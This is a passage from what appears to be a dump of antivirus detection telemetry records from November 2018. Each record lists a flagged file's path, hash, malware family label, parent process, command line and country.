  Row(detection=Row(filename='image4797.jpg', filepath='C:\\Users\\X\\Pictures\\image4797.JPG', filesize=3072000, name='DR/FakePic.Gen.#M1.#R1'), hash='e9af3173d17795b2180715eaf021aaa9ea7f846b6c7070e2d68cf633b4ec2bb5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe24_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe24 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T18:23:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023aa08', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023aa08', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:02:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='afdwufiohelper.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Ulead Systems\\Ulead VideoStudio SE DVD\\afdwuFIOHelper.dll', filesize=156000, name='W32/Ramnit.C.#M1.#R1'), hash='e224002d8723466e1666733d7bef676ccd79dabffd1031bfea5adee1d879e877', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:06:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0                                                                                           .exe', filepath='H:\\\xa0                                                                                           .exe', filesize=0, name='W32/Sality.AT.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:37:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='the rasterbator installer.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\latest\\DRIVEE\\Downloads\\The Rasterbator Installer.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='ed9dab9bf727d1f1a9fb1b206024b66130ef0437038c5a821870e5712a1d2d38', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:01:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='install.exe', filepath='C:\\_GCafePRO\\Install.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='efff492fa9c08971d6e94cd9c048cf110233d66669f52d1568761113e2054bca', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\\\\\\\" ', country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1965136, timestamp='2018-11-04T17:55:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='I:\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:L0CyqZHqOUu\\\\\\/EYG3.1', country='HR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T19:53:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\6a2c9780a77b48ce270d3a5fa00dccd58aab235f', filesize=2048000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='fd769a9c83d89f3ff40cf8b8cd651fee79f6133351a4e1522481a01c9c4e60f3', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\hpScannerEngineAvira\\hpScannerEngineAvira.exe', parentsize=17408, timestamp='2018-11-01T07:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$r4rjods', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$R4RJODS', filesize=64000, name='VBA/Dldr.Agent.mluun.#M1.#R1'), hash='fafbd357ed3a1742e58426e8a0b46c9ccc7543274499cac55713f559eabdbd78', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clipgrab-3.6.8-cgorg.exe', filepath='\\\\200.200.200.171\\Users\\shahool\\Downloads\\clipgrab-3.6.8-cgorg.exe', filesize=22980000, name='PUA/Fusion.DQ.#M1.#R1'), hash='f778b6f7714dee9066ca7d18aaa572b7e824a3cd871882687d20c61073cbd797', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T04:54:11Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='ehshell.exe', filepath='\\\\?\\C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='45be007a8ae20a92b3dd34e6c9760c9a9fdb69663daaf7b6d5c320636714601b', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='hdrwimg.dll', filepath='\\\\?\\F:\\高级数据恢复\\数据恢复软件\\Diskgen\\Diskgen\\HdrwImg.dll', filesize=64000, name='W32/Ramnit.CD.#M1.#R1'), hash='47c4cdd9a823919c56f78edcd5f72f820aceb7043253e921c4d9d9a2355d9d6b', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:50:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\09A30B124411BBAB4C3F9E43FD6912029F1BE751532C89B44D20E092F8D6368C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='09a30b124411bbab4c3f9e43fd6912029f1be751532c89b44d20e092f8d6368c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:20:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etpricesupd.exe', filepath='C:\\ETKA\\VWAU\\Updater\\Utils\\EtPricesUpd.exe', filesize=1216000, name='HEUR/AGEN.1024609.#M1.#R1'), hash='306c10fc628385bbab90fd17720eeac239b7d8e001cdb72db68317631af13cc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Ycp1vE+zQ0qQYwLB.1', country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:14:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\zzzcartella cambio computer\\autocad 2012\\x64\\acad\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='6b39243d41259b85ff24e80741901584b3fb9d81f2abd4ac2b4d3fee5f93b2cb', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1AF0128EE50EF35648AF4037EAA25482A5787113DFF2480B798C1DCB78D285BF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1af0128ee50ef35648af4037eaa25482a5787113dff2480b798c1dcb78d285bf', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:56:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-14-12-07.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-27T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T02:52:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='59d42f667f52e4572ae41eba26f810867c3a9b041622fb5bbbc5818e8f6f7fe8', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T14:39:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-02T22:15:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1D2685E4ACE3FB52FB99BF29DD0892B348C2ED611A6C8221B3FE1DC9A3987612', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1d2685e4ace3fb52fb99bf29dd0892b348c2ed611a6c8221b3fe1dc9a3987612', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vncviewer.exe', filepath='\\\\?\\D:\\GoogleDrive\\156\\WinVNC\\vncviewer.exe', filesize=1024000, name='TR/Patched.Ren.Gen.#M300.#R3368'), hash='4636eea3ecf8b7b97da7ee53eba80a24efc97ec6bce7f9d2f6ea2923827f4a29', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:41:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101913-984a698b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2d3db38b\\AVSCAN-20181102-101826-91C75354\\AVSCAN-20181102-101913-984A698B', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T03:19:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-02T20:05:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F9F0BB9D762AA110FC70628DCE882CD288B4E5856B8064DD73687952AF0B067', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6f9f0bb9d762aa110fc70628dce882cd288b4e5856b8064dd73687952af0b067', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:58:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bfb82410', filepath='C:\\Users\\X\\Desktop\\BFB82410', filesize=128000, name='X2000M/Agent.6489234.#M1.#R1'), hash='119f96ae1a8598d250986a9b2fdd7618d1b9dbd26628185f69fac0ae59ced889', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T06:26:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='folder.pif', filepath='D:\\DOKUMENKU\\GABUNG NOM DEPOSITO\\2012\\DEPO AGS 2012\\New Folder\\Folder.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:26:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='vshub.exe', filepath='\\\\?\\C:\\ProgramData\\vshub.exe', filesize=1536000, name='TR/CoinMiner.CW.#M1.#R1'), hash='6aee240dfea62ae0faa6b60867f34b25450b3f8d09ad924f6993d7252f897862', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:57:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='overdos.exe', filepath='D:\\DDOS Tools\\OverDoS.exe', filesize=384000, name='HEUR/AGEN.1005124.#M1.#R1'), hash='06c39f81fc1037e75a0a2895981d584f6facb5a355f744d79154a57d41edff89', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T14:24:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='konvert245.exe', filepath='\\\\192.168.2.4\\daten\\LC2\\lc\\buf\\lctop2.45-31.03.14\\konvert245.exe', filesize=18560000, name='W32/Infector.Gen9.#M300.#R800021'), hash='16406fc404c83d378fd85aff83733a76fb02eaaa3863f5db65229c1238998e3b', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:9RDTQEcFJ0Kb0csk.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T07:04:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\46A5D04EAE4C913CB86E4486DD015FEED077EA2786AA209503D1CD6275579461', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46a5d04eae4c913cb86e4486dd015feed077ea2786aa209503d1cd6275579461', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:43:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:05:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:01:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-085743-641ee976', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42b61ea2\\AVSCAN-20181102-085724-6084B2F7\\AVSCAN-20181102-085743-641EE976', filesize=2560000, name='TR/Black.Gen2.#M1.#R1'), hash='3600f95d74d3eedb693c26f0533afc0ac366bd857770711dbe9dafee1340bc5a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:57:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-011000-65d0fef6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb24b2b1\\AVSCAN-20181102-010924-60C888C1\\AVSCAN-20181102-011000-65D0FEF6', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T00:10:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='gpusniffer.exe', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Audition CS6\\GPUSniffer.exe', filesize=100000, name='W32/Sality.AT.#M1.#R1'), hash='194728e585494a63ef409177dd1058087fedabc08a76dfe6fc6f74cf585a65ba', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:pZjwHKFYTUavmQU1.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:11:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rthdvcpl.exe', filepath='C:\\Program Files\\Realtek\\Audio\\HDA\\RtHDVCpl.exe', filesize=15008000, name='W32/Sality.AT.#M1.#R1'), hash='368684a02a35a40a9369f5ca3da67d8a808719a15cc05a05609f3d13bd1aa020', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:24:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_blackjack.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_Blackjack\\Rules_Blackjack.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120444-2baa87a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120444-2BAA87A6', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:38:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T08:47:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:37:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-000932-9efd66f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_267b6185\\AVSCAN-20181102-235252-420EE3D5\\AVSCAN-20181103-000932-9EFD66F0', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T23:09:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1_15_20_2.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Photoshop 7.0\\Help\\1_15_20_2.html', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='099497c2cf174d8b393ac0cbf7dc7e154053ec1ec2dbde8a0e221aa082aed89a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:54:08Z'), dt=datetime.date(2018, 11, 2)),
